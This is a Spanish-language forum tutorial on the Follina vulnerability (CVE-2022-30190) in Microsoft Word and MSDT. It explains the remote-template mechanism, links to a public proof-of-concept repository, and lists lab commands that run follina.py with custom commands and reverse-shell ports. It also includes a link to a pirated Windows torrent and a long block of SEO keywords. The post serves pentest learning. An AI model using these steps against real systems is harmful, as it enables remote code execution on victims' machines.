HACKEADO con un ARCHIVO WORD en WINDOWS | Seguridad Informática | Kali Linux

Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2053
Registered for: 8 years 8 months
8
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 40
Contactar:

HACKEADO con un ARCHIVO WORD en WINDOWS | Seguridad Informática | Kali Linux

#1

Mensaje por admin »

Es una vulnerabilidad en Microsot Office .Basicamente usa la función de plantilla remota de Microsoft Word para recuperar un archivo HTML de un servidor web remoto,basicamente la carga maliciosa desde el puerto 8000 y que a su vez usa el "Microsfot Support Diagnostic Tool" "MSDT" basicamente para ejecutar un comando en powershell. En resumidas cuentas al MSDT por alguna razon se le pueden pasar parametros.

Imagen
 
LABORATORIO

Imagen
 
Imagen
 
LINKS IMPORTANTES

https://www.vicarius.io/vsociety/blog/m ... p-10597848

https://securelist.com/cve-2022-30190-f ... on/106703/

https://ethical.blue/textz/n/32

https://ciberseguridad.blog/analizando- ... 022-30190/

https://github.com/JohnHammond/msdt-follina.git

https://github.com/JohnHammond/msdt-follina

https://github.com/JohnHammond/msdt-follina/issues/25

https://github.com/JohnHammond/msdt-follina/issues/16

Windows con office
https://1337x.to/torrent/5144653/Window ... 2022-CzOS/

COMANDOS

Código: Seleccionar todo

/var/www/html

service apache2 status

service apache2 start


python3 follina.py ---> Por defecto en este caso se abre la calculadora
python3 follina.py -c "notepad.exe"

python3 follina.py -c "notepad"


python3 follina.py -r 9999
python3 follina.py -r 9001
VIDEO TUTORIAL



Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability Microsoft Office Word Proof-of-Concept PoC CVE-2022-30190 MS Office PowerShell Linea de Comandos Pagina HTML Reverse Shell Connection Zero-Day Pentesting Security Technologies Nmap Sistema operativo Operating Systems Instalación y configuración Install and configure ssh Metasploit Unauthenticated LAN Remote Code Execution Telnet networking Handshake backdoor LAN | Local Area Network CMD execution How to Exploit and Test this Critical Vulnerability Netcat Listener Exploit Code NC NetCat GitHub Firewall Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide OWASP ZAP Debian Red Hat Terminal python blue team red team Windows Bug Actualizar update parchear Operating System mfsconsole vulnerabilidades de seguridad detección de intrusos Networking Linux Ubuntu MacOS PowerPoint Access Hash cifrado descrifrar instalacion install PowerShell Step-by-Step Download o bajar database apache base de datos Vulnerabilidades Perl SQL Injection Exploitation Explanation Burp suite Command Injection php Bypass All Security proxy VULNERABILITIES parrot Escalar privilegios en Linux Apache Nginx Routing redes hogareñas Server and Client in Python Localhost binaries certificates certificados OSI Model Modelo TCP/IP VPN metadatos kali linux ciberseguridad metadatos ciberseguridad information systems security professional how hackers hack into pc ehtical hacking cyber seguridad kali linux proteger computadoras kali linux 2.0 comptia security+ detección de intrusiones en la red naturalsoul metadatos de una imagen hacking etico ethical hacker servidores tutorial hackers how hackers do it
Ethical Hacker,Penetration Tester,Cybersecurity Consultant,learn security,unix,OSINT,oscp certification,try hack me,hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,comandos,commands,remote function,laboratorio,lab,testing,servidor,como escalar privilegios en windows o linux,kernel vulnerable,FOLLINA MSDT,CVE



 
 

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Responder

Create an account or sign in to join the discussion

You need to be a member in order to post a reply

Create an account

Not a member? register to join our community
Members can start their own topics & subscribe to topics
It’s free and only takes a minute

Registrarse

Sign in

  • Temas similares
    Respuestas
    Vistas
    Último mensaje

Volver a “Redes/Networking”

¿Quién está conectado?

Usuarios navegando por este Foro: No User AvatarGoogle Adsense [Bot] y 0 invitados